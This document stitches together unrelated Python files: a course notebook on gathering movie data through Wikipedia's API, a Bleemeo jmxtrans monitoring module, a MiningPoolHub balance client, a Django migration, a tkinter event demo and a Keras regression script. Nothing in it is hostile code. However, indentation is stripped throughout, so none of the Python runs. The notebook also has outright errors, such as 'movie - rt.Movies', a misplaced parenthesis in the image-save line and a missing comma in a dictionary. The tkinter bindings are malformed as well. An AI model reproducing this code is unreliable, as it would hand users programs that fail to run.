pd.testing.assert_frame_equal(df, df_solution)
df_solution = pd.read_pickle('df_solution.pkl')
df.sort_values('title', inplace = True)
df.reset_index(inplace = True, drop = True)
df_solution.sort_values('title', inplace = True)
df_solution.reset_index(inplace = True, drop = True)
pd.testing.assert_frame_equal(df, df_solution)
# Source - APIs
# now getting each movie's poster to form our word cloud
# can scrape image url from the html, but a better way to access is using API
# API: application programming interface
# since each movie has its poster on Wikipedia movie page, can use Wikipedia API
# Rotten Tomatoes API provides audience scores, we could have hit the API instead of scraping off webpage
# does not provide posters, images, but we would need to apply for usage
# always choose API over scraping when available, scraping is brittle, can break when html changes
# example using rt api
import rtsimple as rt
rt.API_KEY = 'YOUR API KEY HERE' # we only have access to this once RT approves our proposal
movie - rt.Movies('10489') # movie id
movie.ratings['audience_score'] # then we access the ratings
# because we do not have access to the RT API, we will use MediaWiki, which hosts Wikipedia data
# Quiz
# In the Jupyter Notebook below, get the page object for the E.T. The Extra-Terrestial Wikipedia page. Here is the E.T. Wikipedia page for easy reference.
import wptools
# Your code here: get the E.T. page object
# This cell make take a few seconds to run
page = wptools.page('E.T._the_Extra-Terrestrial').get()
# Accessing the image attribute will return the images for this page
page.data['image']
# JSON file structure
# Javascript Object Notation
# XML extensible mark up language
# referencing JSON files in python is just like acessing dictionaries
# JSON objects interpreted as dictionaries, arrays as lists
infobox_json
infobox_json['Box Office']
# result: total box office
infobox_json['Produced By']
# result: 2 director names
infobox_json['Release'][1]['Location']
# there are 2 release dates, this accesses the 2nd release, and its location
import wptools
page = wptools.page('E.T._the_Extra-Terrestrial').get()
# Quiz 1
# Access the first image in the images attribute, which is a JSON array.
page.data['image'][0]
# Quiz 2
# Access the director key of the infobox attribute, which is a JSON object.
page.data['infobox']['director']
# Gathering mashup solution
import pandas as pd
import wptools
import os
import requests
from PIL import Image
from io import BytesIO
title_list = [
'The_Wizard_of_Oz_(1939_film)',
'Citizen_Kane',
'The_Third_Man',
'Get_Out_(film)',
'Mad_Max:_Fury_Road',
'The_Cabinet_of_Dr._Caligari',
'All_About_Eve',
'Inside_Out_(2015_film)',
'The_Godfather',
'Metropolis_(1927_film)',
'E.T._the_Extra-Terrestrial',
'Modern_Times_(film)',
'It_Happened_One_Night',
"Singin'_in_the_Rain",
'Boyhood_(film)',
'Casablanca_(film)',
'Moonlight_(2016_film)',
'Psycho_(1960_film)',
'Laura_(1944_film)',
'Nosferatu',
'Snow_White_and_the_Seven_Dwarfs_(1937_film)',
"A_Hard_Day%27s_Night_(film)",
'La_Grande_Illusion',
'North_by_Northwest',
'The_Battle_of_Algiers',
'Dunkirk_(2017_film)',
'The_Maltese_Falcon_(1941_film)',
'Repulsion_(film)',
'12_Years_a_Slave_(film)',
'Gravity_(2013_film)',
'Sunset_Boulevard_(film)',
'King_Kong_(1933_film)',
'Spotlight_(film)',
'The_Adventures_of_Robin_Hood',
'Rashomon',
'Rear_Window',
'Selma_(film)',
'Taxi_Driver',
'Toy_Story_3',
'Argo_(2012_film)',
'Toy_Story_2',
'The_Big_Sick',
'Bride_of_Frankenstein',
'Zootopia',
'M_(1931_film)',
'Wonder_Woman_(2017_film)',
'The_Philadelphia_Story_(film)',
'Alien_(film)',
'Bicycle_Thieves',
'Seven_Samurai',
'The_Treasure_of_the_Sierra_Madre_(film)',
'Up_(2009_film)',
'12_Angry_Men_(1957_film)',
'The_400_Blows',
'Logan_(film)',
'All_Quiet_on_the_Western_Front_(1930_film)',
'Army_of_Shadows',
'Arrival_(film)',
'Baby_Driver',
'A_Streetcar_Named_Desire_(1951_film)',
'The_Night_of_the_Hunter_(film)',
'Star_Wars:_The_Force_Awakens',
'Manchester_by_the_Sea_(film)',
'Dr._Strangelove',
'Frankenstein_(1931_film)',
'Vertigo_(film)',
'The_Dark_Knight_(film)',
'Touch_of_Evil',
'The_Babadook',
'The_Conformist_(film)',
'Rebecca_(1940_film)',
"Rosemary%27s_Baby_(film)",
'Finding_Nemo',
'Brooklyn_(film)',
'The_Wrestler_(2008_film)',
'The_39_Steps_(1935_film)',
'L.A._Confidential_(film)',
'Gone_with_the_Wind_(film)',
'The_Good,_the_Bad_and_the_Ugly',
'Skyfall',
'Rome,_Open_City',
'Tokyo_Story',
'Hell_or_High_Water_(film)',
'Pinocchio_(1940_film)',
'The_Jungle_Book_(2016_film)',
'La_La_Land_(film)',
'Star_Trek_(film)',
'High_Noon',
'Apocalypse_Now',
'On_the_Waterfront',
'The_Wages_of_Fear',
'The_Last_Picture_Show',
'Harry_Potter_and_the_Deathly_Hallows_–_Part_2',
'The_Grapes_of_Wrath_(film)',
'Roman_Holiday',
'Man_on_Wire',
'Jaws_(film)',
'Toy_Story',
'The_Godfather_Part_II',
'Battleship_Potemkin'
]
folder_name = 'bestofrt_posters'
if not os.path.exists(folder_name):
os.makedirs(folder_name)
# List of dictionaries to build and convert to a DataFrame later
df_list = []
image_errors = {} #
for title in title_list:
try: # try and except go together, code will not break between try and except, instead errors will go to the except portion
# This cell is slow so print ranking to gauge time remaining
ranking = title_list.index(title) + 1 # includes movie's ranking within top 100, need to add 1 because of 0 indexing
print(ranking)
page = wptools.page(title, silent=True) # silent=True means do not echo page data if true, saying not to print while running
images = page.get().data['image']
# First image is usually the poster
first_image_url = images[0]['url']
r = requests.get(first_image_url)
# download movie poster image
i = Image.open(BytesIO(r.content)) # what does the BytesIO do again?
image_file_format = first_image_url.split('.')[-1] # split at the ., cutting off the very end .jpeg (for example), wanted to clean links
i.save(folder_name) + "/" + str(ranking) + "_" + title + '.' + image_file_format)
# Append to list of dictionaries
df_list.append({'ranking': int(ranking)
'title': title,
'poster_url': first_image_url})
# Not best practice to catch all exceptions but fine for this short script
except Exception as e:
print(str(ranking) + '_' + title + ": " + str(e))
image_errors[str(ranking) + "_" + title] = images
# One you have completed the above code requirements, read and run the three cells below and interpret their output.
for key in image_errors.keys():
print(key)
# Inspect unidentifiable images and download them individually
for rank_title, images in image_errors.items():
if rank_title == '22_A_Hard_Day%27s_Night_(film)':
url = 'https://upload.wikimedia.org/wikipedia/en/4/47/A_Hard_Days_night_movieposter.jpg'
title = rank_title[3:]
df_list.append({'ranking': int(title_list.index(title) + 1),
'title' : title,
'poster_url': url})
# Relational Databases and pandas
# Imagine this notebook contains all of the gathering code from this entire lesson, plus the assessing and cleaning code done behind the scenes, and that the final product is a merged master DataFrame called df.
import pandas as pd
df = pd.read_csv('bestofrt_master.csv')
df.head(3)
# Connect to a database
from sqlalchemy import create_engine
# Create SQLAlchemy Engine and empty bestofrt database
# bestofrt.db will not show up in the Jupyter Notebook dashboard yet
engine = create_engine('sqlite:///bestofrt.db')
# 2. Store pandas DataFrame in database
# Store the data in the cleaned master dataset (bestofrt_master) in that database.
# Store cleaned master DataFrame ('df') in a table called master in bestofrt.db
# bestofrt.db will be visible now in the Jupyter Notebook dashboard
# 3. Read database data into a pandas DataFrame
# Read the brand new data in that database back into a pandas DataFrame.
df_gather = pd.read_sql('SELECT * FROM master', engine)
df_gather.head(3) |
from .data_source import DataSource
from .layout import AnalysisLayout
from .visual_analysis import VisualAnalysis
# Import Widgets so that they get registered
import pandas_visual_analysis.widgets
import plotly.io as pio
pio.templates.default = "plotly_white"
|
import numpy as np
import matplotlib.pyplot as plt
# SeLU(scaled exponential linear unit)
def selu(x):
alpha = 1.67326324
scale = 1.05070098
if not scale > 1:
raise ValueError
if x > 0:
return scale * x
else :
return scale * alpha * (np.exp(x) - 1)
x = np.arange(-5, 5, 0.1)
y = [selu(i) for i in x]
print(x)
print(y)
plt.plot(x, y)
plt.grid()
plt.show()
#### 과제
# elu, selu, reakly_relu
# 72_2, 3, 4 |
#
# Copyright 2017 Bleemeo
#
# bleemeo.com an infrastructure monitoring solution in the Cloud
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import hashlib
import json
import logging
import os
import time
import bleemeo_agent.type
import bleemeo_agent.util
JMX_METRICS = {
'java': [
{
'name': 'jvm_heap_used',
'mbean': 'java.lang:type=Memory',
'attribute': 'HeapMemoryUsage',
'path': 'used',
},
{
'name': 'jvm_non_heap_used',
'mbean': 'java.lang:type=Memory',
'attribute': 'NonHeapMemoryUsage',
'path': 'used',
},
{
'name': 'jvm_gc',
'mbean': 'java.lang:type=GarbageCollector,name=*',
'attribute': 'CollectionCount',
'derive': True,
'sum': True,
'typeNames': ['name'],
},
{
'name': 'jvm_gc_time',
'mbean': 'java.lang:type=GarbageCollector,name=*',
'attribute': 'CollectionTime',
'derive': True,
'sum': True,
'typeNames': ['name'],
},
{
'name': 'jvm_gc_utilization',
'mbean': 'java.lang:type=GarbageCollector,name=*',
'attribute': 'CollectionTime',
'derive': True,
'sum': True,
'typeNames': ['name'],
'scale': 0.1, # time is in ms/s. Convert in %
},
],
'bitbucket': [
{
'name': 'events',
'mbean':
'com.atlassian.bitbucket.thread-pools:name=EventThreadPool',
'attribute': 'CompletedTaskCount',
'derive': True,
},
{
'name': 'io_tasks',
'mbean':
'com.atlassian.bitbucket.thread-pools:name=IoPumpThreadPool',
'attribute': 'CompletedTaskCount',
'derive': True,
},
{
'name': 'tasks',
'mbean':
'com.atlassian.bitbucket.thread-pools'
':name=ScheduledThreadPool',
'attribute': 'CompletedTaskCount',
'derive': True,
},
{
'name': 'pulls',
'mbean': 'com.atlassian.bitbucket:name=ScmStatistics',
'attribute': 'Pulls',
'derive': True,
},
{
'name': 'pushes',
'mbean': 'com.atlassian.bitbucket:name=ScmStatistics',
'attribute': 'Pushes',
'derive': True,
},
{
'name': 'queued_scm_clients',
'mbean': 'com.atlassian.bitbucket:name=HostingTickets',
'attribute': 'QueuedRequests',
},
{
'name': 'queued_scm_commands',
'mbean': 'com.atlassian.bitbucket:name=CommandTickets',
'attribute': 'QueuedRequests',
},
{
'name': 'queued_events',
'mbean': 'com.atlassian.bitbucket:name=EventStatistics',
'attribute': 'QueueLength',
},
{
'name': 'ssh_connections',
'mbean': 'com.atlassian.bitbucket:name=SshSessions',
'attribute': 'SessionCreatedCount',
'derive': True,
},
{
'name': 'requests',
'mbean': 'Catalina:type=GlobalRequestProcessor,name=*',
'attribute': 'requestCount',
'typeNames': ['name'],
'sum': True,
'derive': True,
},
{
'name': 'request_time',
'mbean': 'Catalina:type=GlobalRequestProcessor,name=*',
'attribute': 'processingTime',
'typeNames': ['name'],
'ratio': 'requests',
'sum': True,
'derive': True,
},
{
'name': 'requests',
'mbean': 'Tomcat:type=GlobalRequestProcessor,name=*',
'attribute': 'requestCount',
'typeNames': ['name'],
'sum': True,
'derive': True,
},
{
'name': 'request_time',
'mbean': 'Tomcat:type=GlobalRequestProcessor,name=*',
'attribute': 'processingTime',
'typeNames': ['name'],
'ratio': 'requests',
'sum': True,
'derive': True,
},
],
'cassandra': [
{
'name': 'read_requests',
'mbean':
'org.apache.cassandra.metrics:'
'type=ClientRequest,scope=Read,name=Latency',
'attribute': 'Count',
'derive': True,
},
{
'name': 'read_time',
'mbean':
'org.apache.cassandra.metrics:'
'type=ClientRequest,scope=Read,name=TotalLatency',
'attribute': 'Count',
'scale': 0.001, # convert from microsecond to millisecond
'derive': True,
},
{
'name': 'write_requests',
'mbean':
'org.apache.cassandra.metrics:'
'type=ClientRequest,scope=Write,name=Latency',
'attribute': 'Count',
'derive': True,
},
{
'name': 'write_time',
'mbean':
'org.apache.cassandra.metrics:'
'type=ClientRequest,scope=Write,name=TotalLatency',
'attribute': 'Count',
'scale': 0.001, # convert from microsecond to millisecond
'derive': True,
},
{
'name': 'bloom_filter_false_ratio',
'mbean':
'org.apache.cassandra.metrics:'
'type=Table,name=BloomFilterFalseRatio',
'attribute': 'Value',
'scale': 100, # convert from ratio (0 to 1) to percent
},
{
'name': 'sstable',
'mbean':
'org.apache.cassandra.metrics:'
'type=Table,name=LiveSSTableCount',
'attribute': 'Value',
},
],
'confluence': [
{
'name': 'last_index_time',
'mbean': 'Confluence:name=IndexingStatistics',
'attribute': 'LastElapsedMilliseconds',
},
{
'name': 'queued_index_tasks',
'mbean': 'Confluence:name=IndexingStatistics',
'attribute': 'TaskQueueLength',
},
{
'name': 'db_query_time',
'mbean': 'Confluence:name=SystemInformation',
'attribute': 'DatabaseExampleLatency',
},
{
'name': 'queued_mails',
'mbean': 'Confluence:name=MailTaskQueue',
'attribute': 'TasksSize',
},
{
'name': 'queued_error_mails',
'mbean': 'Confluence:name=MailTaskQueue',
'attribute': 'ErrorQueueSize',
},
{
'name': 'requests',
'mbean': 'Standalone:type=GlobalRequestProcessor,name=*',
'attribute': 'requestCount',
'typeNames': ['name'],
'sum': True,
'derive': True,
},
{
'name': 'request_time',
'mbean': 'Standalone:type=GlobalRequestProcessor,name=*',
'attribute': 'processingTime',
'typeNames': ['name'],
'ratio': 'requests',
'sum': True,
'derive': True,
},
],
'jira': [
{
'name': 'requests',
'mbean': 'Catalina:type=GlobalRequestProcessor,name=*',
'attribute': 'requestCount',
'typeNames': ['name'],
'sum': True,
'derive': True,
},
{
'name': 'request_time',
'mbean': 'Catalina:type=GlobalRequestProcessor,name=*',
'attribute': 'processingTime',
'typeNames': ['name'],
'ratio': 'requests',
'sum': True,
'derive': True,
},
],
}
CASSANDRA_JMX_DETAILED_TABLE = [
{
'name': 'bloom_filter_false_ratio',
'mbean':
'org.apache.cassandra.metrics:'
'type=Table,keyspace={keyspace},scope={table},'
'name=BloomFilterFalseRatio',
'attribute': 'Value',
'typeNames': ['keyspace', 'scope'],
'scale': 100, # convert from ratio (0 to 1) to percent
},
{
'name': 'sstable',
'mbean':
'org.apache.cassandra.metrics:'
'type=Table,keyspace={keyspace},scope={table},'
'name=LiveSSTableCount',
'attribute': 'Value',
'typeNames': ['keyspace', 'scope'],
},
{
'name': 'read_time',
'mbean':
'org.apache.cassandra.metrics:'
'type=Table,keyspace={keyspace},scope={table},'
'name=ReadTotalLatency',
'attribute': 'Count',
'derive': True,
'typeNames': ['keyspace', 'scope'],
},
{
'name': 'read_requests',
'mbean':
'org.apache.cassandra.metrics:'
'type=Table,keyspace={keyspace},scope={table},'
'name=ReadLatency',
'attribute': 'Count',
'derive': True,
'typeNames': ['keyspace', 'scope'],
},
{
'name': 'write_time',
'mbean':
'org.apache.cassandra.metrics:'
'type=Table,keyspace={keyspace},scope={table},'
'name=WriteTotalLatency',
'attribute': 'Count',
'derive': True,
'typeNames': ['keyspace', 'scope'],
},
{
'name': 'write_requests',
'mbean':
'org.apache.cassandra.metrics:'
'type=Table,keyspace={keyspace},scope={table},'
'name=WriteLatency',
'attribute': 'Count',
'derive': True,
'typeNames': ['keyspace', 'scope'],
},
]
def update_discovery(core):
try:
_CURRENT_CONFIG.write_config(core)
except Exception: # pylint: disable=broad-except
logging.warning(
'Failed to write jmxtrans configuration. '
'Continuing with current configuration'
)
logging.debug('exception is:', exc_info=True)
class Jmxtrans:
""" Configure and process graphite data from jmxtrans
"""
# pylint: disable=too-many-instance-attributes
def __init__(self, graphite_client):
self.core = graphite_client.core
self.graphite_client = graphite_client
self.last_timestamp = 0
# used to compute derivated values
self._raw_value = {}
self._sum_value = {}
self._ratio_value = {}
self._values_cache = {}
self.last_timestamp = 0
self.last_purge = bleemeo_agent.util.get_clock()
def close(self):
self.flush(self.last_timestamp)
def emit_metric(self, name, timestamp, value):
# pylint: disable=too-many-locals
# pylint: disable=too-many-branches
# pylint: disable=too-many-statements
if abs(timestamp - self.last_timestamp) > 1:
self.flush(self.last_timestamp)
self.last_timestamp = timestamp
clock = bleemeo_agent.util.get_clock()
if clock - self.last_purge > 60:
self.purge_metrics()
self.last_purge = clock
# Example of name: jmxtrans.f5[...]d6.20[...]7b.HeapMemoryUsage_used
part = name.split('.')
if len(part) == 4:
(_, md5_service, md5_mbean, attr) = part
type_names = None
elif len(part) == 5:
(_, md5_service, md5_mbean, type_names, attr) = part
else:
logging.debug(
'Unexpected number of part for jmxtrans metrics: %s',
name,
)
return
try:
(service_name, instance) = _CURRENT_CONFIG.to_service[md5_service]
except KeyError:
logging.debug('Service not found for %s', name)
return
metric_key = (md5_service, md5_mbean, attr)
try:
jmx_metrics = _CURRENT_CONFIG.to_metric[metric_key]
except KeyError:
return
for jmx_metric in jmx_metrics:
new_name = '%s_%s' % (service_name, jmx_metric['name'])
if instance is not None and type_names is not None:
item = instance + '_' + type_names
elif type_names is not None:
item = type_names
else:
item = instance
if jmx_metric.get('derive'):
new_value = self.get_derivate(
new_name, item, timestamp, value
)
if new_value is None:
continue
else:
new_value = value
labels = {}
if item:
labels['item'] = item
if jmx_metric.get('scale'):
new_value = new_value * jmx_metric['scale']
metric_point = bleemeo_agent.type.DEFAULT_METRICPOINT._replace(
label=new_name,
labels=labels,
time=timestamp,
value=new_value,
service_label=service_name,
service_instance=instance,
)
if jmx_metric.get('sum', False):
item = instance
self._sum_value.setdefault(
(new_name, instance, service_name), (jmx_metric, [])
)[1].append(new_value)
continue
elif jmx_metric.get('ratio') is not None:
key = (new_name, instance, service_name)
self._ratio_value[key] = (jmx_metric, new_value)
continue
if new_name in _CURRENT_CONFIG.divisors:
self._values_cache[(new_name, item)] = (timestamp, new_value)
self.core.emit_metric(metric_point)
def packet_finish(self):
""" Called when graphite_client finished processing one TCP packet
"""
def flush(self, timestamp):
for key, (jmx_metric, values) in self._sum_value.items():
(name, item, service_name) = key
labels = {}
if item:
labels['item'] = item
metric_point = bleemeo_agent.type.DEFAULT_METRICPOINT._replace(
label=name,
labels=labels,
time=timestamp,
value=sum(values),
service_label=service_name,
service_instance=item,
)
if jmx_metric.get('ratio') is not None:
self._ratio_value[key] = (jmx_metric, sum(values))
else:
if name in _CURRENT_CONFIG.divisors:
self._values_cache[(name, item)] = (timestamp, sum(values))
self.core.emit_metric(metric_point)
self._sum_value = {}
for key, (jmx_metric, value) in self._ratio_value.items():
(name, item, service_name) = key
divisor_name = "%s_%s" % (service_name, jmx_metric['ratio'])
divisor = self._values_cache.get((divisor_name, item))
new_value = None
if divisor is None or abs(divisor[0] - timestamp) > 1:
logging.debug(
'Failed to compute ratio metric %s (%s) at time %s',
name,
item,
timestamp,
)
elif divisor[1] == 0:
new_value = 0.0
else:
new_value = value / divisor[1]
labels = {}
if item:
labels['item'] = item
if new_value is not None:
metric_point = bleemeo_agent.type.DEFAULT_METRICPOINT._replace(
label=name,
labels=labels,
time=timestamp,
value=new_value,
service_label=service_name,
service_instance=item,
)
self.core.emit_metric(metric_point)
self._ratio_value = {}
def get_derivate(self, name, item, timestamp, value):
""" Return derivate of a COUNTER (e.g. something that only goes upward)
"""
# self.lock is acquired by caller
(old_timestamp, old_value) = self._raw_value.get(
(name, item), (None, None)
)
self._raw_value[(name, item)] = (timestamp, value)
if old_timestamp is None:
return None
delta = value - old_value
delta_time = timestamp - old_timestamp
if delta_time == 0:
return None
if delta < 0:
return None
return delta / delta_time
def purge_metrics(self):
""" Remove old metrics from self._raw_value
"""
now = time.time()
cutoff = now - 60 * 6
self._raw_value = {
key: (timestamp, value)
for key, (timestamp, value) in self._raw_value.items()
if timestamp >= cutoff
}
self._values_cache = {
key: (timestamp, value)
for key, (timestamp, value) in self._values_cache.items()
if timestamp >= cutoff
}
class JmxConfig:
def __init__(self, core):
self.core = core
# map md5_service to (service_name, instance)
self.to_service = {}
# map (md5_service, md5_bean, attr) to a list of jmx_metrics
self.to_metric = {}
# list of divisor for a ratio
self.divisors = set()
def get_jmxtrans_config(self, empty=False):
# pylint: disable=too-many-locals
# pylint: disable=too-many-branches
config = {
'servers': []
}
to_service = {}
to_metric = {}
divisors = set()
if empty:
return json.dumps(config)
output_config = {
"@class":
"com.googlecode.jmxtrans.model.output.GraphiteWriterFactory",
"rootPrefix": "jmxtrans",
"port": self.core.config['graphite.listener.port'],
"host": self.core.config['graphite.listener.address'],
"flushStrategy": "timeBased",
"flushDelayInSeconds": self.core.metric_resolution,
}
if output_config['host'] == '0.0.0.0':
output_config['host'] = '127.0.0.1'
for (key, service_info) in sorted(self.core.services.items()):
if not service_info.get('active', True):
continue
(service_name, instance) = key
if service_info.get('address') is None and instance:
# Address is None if this check is associated with a stopped
# container. In such case, no metrics could be gathered.
continue
if 'jmx_port' in service_info and 'address' in service_info:
jmx_port = service_info['jmx_port']
md5_service = hashlib.md5(service_name.encode('utf-8'))
if instance is not None:
md5_service.update(instance.encode('utf-8'))
md5_service = md5_service.hexdigest()
to_service[md5_service] = (service_name, instance)
server = {
'host': service_info['address'],
'alias': md5_service,
'port': jmx_port,
'queries': [],
'outputWriters': [output_config],
'runPeriodSeconds': self.core.metric_resolution,
}
if 'jmx_username' in service_info:
server['username'] = service_info['jmx_username']
server['password'] = service_info['jmx_password']
jmx_metrics = _get_jmx_metrics(service_name, service_info)
for jmx_metric in jmx_metrics:
if 'path' in jmx_metric:
attr = '%s_%s' % (
jmx_metric['attribute'], jmx_metric['path'],
)
else:
attr = jmx_metric['attribute']
md5_mbean = hashlib.md5(
jmx_metric['mbean'].encode('utf-8')
).hexdigest()
metric_key = (md5_service, md5_mbean, attr)
to_metric.setdefault(metric_key, []).append(jmx_metric)
if 'ratio' in jmx_metric:
divisors.add(
"%s_%s" % (service_name, jmx_metric['ratio'])
)
query = {
"obj": jmx_metric['mbean'],
"outputWriters": [],
"resultAlias": md5_mbean,
}
query['attr'] = [jmx_metric['attribute']]
if 'typeNames' in jmx_metric:
query['typeNames'] = jmx_metric['typeNames']
server['queries'].append(query)
config['servers'].append(server)
self.to_metric = to_metric
self.to_service = to_service
self.divisors = divisors
return json.dumps(config, sort_keys=True)
def write_config(self, core):
if self.core is None:
self.core = core
config = self.get_jmxtrans_config()
config_path = self.core.config['jmxtrans.config_file']
if os.path.exists(config_path):
with open(config_path) as config_file:
current_content = config_file.read()
if config == current_content:
logging.debug('jmxtrans already configured')
return
if (config == '{}' == self.get_jmxtrans_config(empty=True)
and not os.path.exists(config_path)):
logging.debug(
'jmxtrans generated config would be empty, skip writing it'
)
return
# Don't simply use open. This file must have limited permission
# since it may contains password
open_flags = os.O_WRONLY | os.O_CREAT | os.O_TRUNC
try:
fileno = os.open(config_path, open_flags, 0o600)
except OSError:
if not os.path.exists(config_path):
logging.debug(
'Failed to write jmxtrans configuration.'
' Target file does not exists,'
' bleemeo-agent-jmx is installed ?'
)
return
raise
with os.fdopen(fileno, 'w') as config_file:
config_file.write(config)
def _get_jmx_metrics(service_name, service_info):
jmx_metrics = list(service_info.get('jmx_metrics', []))
jmx_metrics.extend(JMX_METRICS['java'])
jmx_metrics.extend(JMX_METRICS.get(service_name, []))
if service_name == 'cassandra':
for name in service_info.get('cassandra_detailed_tables', []):
if '.' not in name:
continue
keyspace, table = name.split('.', 1)
for jmx_metric in CASSANDRA_JMX_DETAILED_TABLE:
jmx_metric = jmx_metric.copy()
jmx_metric['mbean'] = jmx_metric['mbean'].format(
keyspace=keyspace, table=table,
)
jmx_metrics.append(jmx_metric)
return jmx_metrics
_CURRENT_CONFIG = JmxConfig(None)
|
import requests
class MiningPoolHub:
def balance(self, config, coins):
response = requests.get('https://miningpoolhub.com/index.php?page=api&action=getuserallbalances&api_key=' + config['key'])
if response.status_code == 200:
data = response.json()
balances = data['getuserallbalances']['data']
total = 0
for balance in balances:
cur = balance['coin']
sum = self.__all(balance)
rate = coins[cur]['price']
total += sum * rate
return total
def __all(self, coin):
total = 0
total += coin['confirmed']
total += coin['unconfirmed']
total += coin['ae_confirmed']
total += coin['ae_unconfirmed']
total += coin['exchange']
return total
def workers(self, config, coins):
mphkey = config['key']
workers = {}
for coinName, coin in coins.items():
response = requests.get('https://' + coin['name'] + '.miningpoolhub.com/index.php?page=api&action=getuserworkers&api_key=' + mphkey)
if response.status_code == 200:
data = response.json()
for worker in data['getuserworkers']['data']:
if worker != 'error':
hashrate = worker['hashrate']
if hashrate > 0:
name = worker['username'].split('.')[1]
algo = coin['algo']
key = name + '_' + algo
if not key in workers:
workers[key] = {
'miner': None,
'name': name,
'algo': algo,
'rate': 0
}
workers[key]['rate'] += hashrate
return workers.values()
|
# Generated by Django 3.2 on 2021-05-16 08:22
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('army_app', '0003_auto_20210515_2217'),
]
operations = [
migrations.AddField(
model_name='gun',
name='active_range',
field=models.FloatField(default='200', help_text='Zadej aktivni dostrel.'),
),
migrations.AddField(
model_name='gun',
name='fire_rate',
field=models.FloatField(default='300', help_text='Zadejte kadenci zbrane.'),
),
migrations.AddField(
model_name='gun',
name='max_range',
field=models.FloatField(default='1000', help_text='Zadej maximalni dostrel.'),
),
migrations.AddField(
model_name='solider',
name='date_of_birth',
field=models.DateField(default='1991-01-01', help_text='Zadej datum narezeni'),
),
]
|
#!/usr/bin/python3
from tkinter import *
class application(Frame):
def __init__(self,master):
super().__init__(master)
self.master=master
self.pack()
self.createWidget()
def createWidget(self):
self.canvas = Canvas(
self,width=200,height=200,bg='white')
self.canvas.pack()
self.canvas.bind('<Button-1>',self.mouseTest)
self.canvas.bind('<B1-Motion>',self.test_drag)
self.canvas.bind('<KeyPress>',self.keyboard_test)
self.canvas.bind('<KeyPress-a>',self.press_a_test)
self.canvas.bind('KeyRelease-a',self.release_a_test)
def mouseTest(self,event):
print('{0},{1}'.format(event.x,event.y))
print('{0},{1}'.format(event.x_root,event.y_root))
print('{0}'.format(event.widget))
def test_drag(self,event):
self.canvas.create_oval(event.x,event.y,event.x+10,event.y+10)
def keyboard_test(self,event):
print('keycode:{0},char:{1},keysym:{2}'.format(event.keycode,event.char,event.keysym))
def press_a_test(self,event):
print('press a')
def release_a_test(self):
print('release a')
if __name__ == '__main__':
root = Tk()
root.geometry('200x200')
app=application(root)
root.mainloop()
|
# -*- coding: utf-8 -*-
"""
Created on Sat Sep 7 15:11:45 2019
@author: 于福波
"""
from keras import Sequential
from keras.layers.core import Dense,Activation,Dropout
from keras import optimizers
from sklearn.model_selection import train_test_split
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.model_selection import KFold
from sklearn.model_selection import StratifiedKFold
from sklearn.model_selection import ShuffleSplit
from sklearn.metrics import mean_squared_error
from sklearn.preprocessing import StandardScaler
from tqdm import tqdm,trange
def write_result(t):
pd.DataFrame(train.history).to_excel(writer,startcol=5*t,sheet_name='loss&mae')
pd.DataFrame(globals()['r_test_'+colnames[0]]).to_excel(writer,startcol=13*t,sheet_name='cor&score')
pd.DataFrame(globals()['r_test_'+colnames[1]]).to_excel(writer,startcol=13*t+3,sheet_name='cor&score')
pd.DataFrame(globals()['r_train_'+colnames[0]]).to_excel(writer,startcol=13*t+6,sheet_name='cor&score')
pd.DataFrame(globals()['r_train_'+colnames[1]]).to_excel(writer,startcol=13*t+9,sheet_name='cor&score')
pd.DataFrame(score).to_excel(writer,startcol=3*t,sheet_name='score')
pred_obv=pd.DataFrame({'y_test_'+colnames[0]:y_test[colnames[0]].reset_index(drop=True),
'y_test_'+colnames[1]:y_test[colnames[1]].reset_index(drop=True),
'y_pred_'+colnames[0]:y_pred[0],
'y_pred_'+colnames[1]:y_pred[1],
'y_train_'+colnames[0]:y_train[colnames[0]].reset_index(drop=True),
'y_train_'+colnames[1]:y_train[colnames[1]].reset_index(drop=True),
'y_train_pred_'+colnames[0]:y_train_pred[0],
'y_train_pred_'+colnames[1]:y_train_pred[1] })
pred_obv.to_excel(writer,sheet_name='obv&pre',startcol=t*9)
def scatter_loss_plot():
plt.subplot(2,3,1)
plt.ylim(-1,1)
plt.xlim(-1,1)
plt.plot(y_test[colnames[0]],y_test_pred[0],'.')
plt.subplot(2,3,2)
plt.ylim(-1,1)
plt.xlim(-1,1)
plt.plot(y_train[colnames[0]],y_train_pred[0],'.')
plt.subplot(2,3,4)
#plt.ylim()
plt.plot(train.history['loss'],'-')
plt.subplot(2,3,5)
#plt.ylim()
plt.plot(train.history['mean_absolute_error'],'-')
plt.subplot(2,3,6)
plt.plot(train.history['val_loss'],'-')
def Network_train(opt,Setlr,dlcs,sjsl,nepochs):
global train,score
Adam=optimizers.Adam(lr=Setlr, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=sjsl, amsgrad=True)
sgd=optimizers.SGD(lr=Setlr, momentum=dlcs, decay=sjsl, nesterov=False)
Adagrad=optimizers.Adagrad(lr=Setlr, epsilon=1e-06)
model.compile(loss='mean_squared_error', optimizer=opt,metrics=['mae'])
#train=model.fit(x_data.iloc[train_index,:],y_data.iloc[train_index,:],
#validation_data=(x_val,y_val),epochs=nepochs,batch_size=16)
train=model.fit(x_train,y_train,validation_split=0.11,epochs=nepochs,batch_size=16,verbose=0)
score=model.evaluate(x_test,y_test,batch_size=16)
def Set_network(n_hide,n_input):
global model
model=Sequential()
model.add(Dense(input_dim=n_input,units=n_hide,kernel_initializer='normal',activation='relu'))
#model.add(PReLU(alpha_initializer='zeros', alpha_regularizer=None, alpha_constraint=None, shared_axes=None))
#model.add(LeakyReLU(alpha=1))
model.add(Dropout(0.2))
#model.add(Dense(input_dim=n_hide,output_dim=n_hide,activation='relu',kernel_initializer='normal'))
#model.add(Dense(input_dim=n_hide,output_dim=n_hide,kernel_initializer='normal'))
#model.add(PReLU(alpha_initializer='zeros', alpha_regularizer=None, alpha_constraint=None, shared_axes=None))
#model.add(Dropout(0.2))
model.add(Dense(input_dim=n_hide,units=1,kernel_initializer='normal'))
#model.add(PReLU(alpha_initializer'zeros', alpha_regularizer=None, alpha_constraint=None, shared_axes=None))
#model.add(LeakyReLU(alpha=1))
def rmse(obs,pre):
return np.sqrt(mean_squared_error(obs, pre))
